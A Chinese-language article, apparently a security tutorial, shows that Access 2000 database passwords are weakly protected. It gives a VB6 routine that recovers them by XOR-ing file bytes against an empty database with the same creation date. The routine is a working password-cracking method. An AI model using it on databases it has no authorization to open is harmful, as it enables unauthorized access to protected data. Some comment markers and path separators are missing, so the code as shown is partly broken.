如果你過分信任 Access 2000數據庫的密碼保護,你可能會因此而蒙受損失。這是因為Access 2000的數據庫級密碼並不安全,相反它很脆弱,甚至下面這段非常小的程序就可以攻破它:
程序一(VB6):Access 2000密碼破譯
Private Sub Command1_Click()
Const Offset = &H43 文件偏移地址:Access數據庫從此處開始存放加密密碼
Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte
Dim i As Integer, Password As String
打開一個空數據庫作為參照
Open "D:VB6_TestMDB_PasswordNew_Empty_DB.mdb" For Binary As #1
打開被密碼保護的數據庫
Open "D:VB6_TestMDB_PasswordPass_Protected_DB.mdb" For Binary As #2
Seek #1, Offset
Seek #2, Offset
For i = 1 To 20 ' Access 2000 數據庫密碼最長允許20位
Get #1, , bEmpty ' 其中每位密碼占兩個字節
Get #2, , bPass ' 一個漢字也僅是一位密碼,占兩個字節
If (bEmpty(1) Xor bPass(1)) <> 0 Then
Password = Password + Chr(bEmpty(1) Xor bPass(1)) ' 將密碼解密
End If
Next
Close 1, 2
MsgBox "Password:" + Password ' 顯示密碼
End Sub
一、深入分析
上述程序成功的關鍵是使用了一個空數據庫(New_Empty_DB.mdb)。該數據庫的創建日期必須與被密碼保護的數據庫(Pass_Protected_DB.mdb)相一致。 換句話說,Access 2000 僅僅是使用“數據庫創建日期”來加密用戶密碼。
應注意的是:上面的“創建日期”只是操作系統級的,也就是 Windows記錄在文件夾目錄裡的信息(根據文件名的長短,每個文件在目錄裡占用至少32個字節,包括:文件名、屬性、文件大小、首蔟號、創建時間、修改時間和訪問時間等)。
Access 2000 在數據庫中也記錄了該數據庫的“創建日期”。加密數據庫密碼的正是數據庫內部記錄的這個“創建日期”。該日期只有在數據庫被成功打開後才能看到。但在一般情況下,操作系統級的以及數據庫內保存的“創建日期”是完全一樣的,因此這為破譯者提供了方便。
上述程序中還有一點需要說明:為簡明起見,解密密碼時僅處理了雙字節的首字節,因此它僅對非漢字密碼有效。若要解密漢字密碼,須對雙字節均做處理。
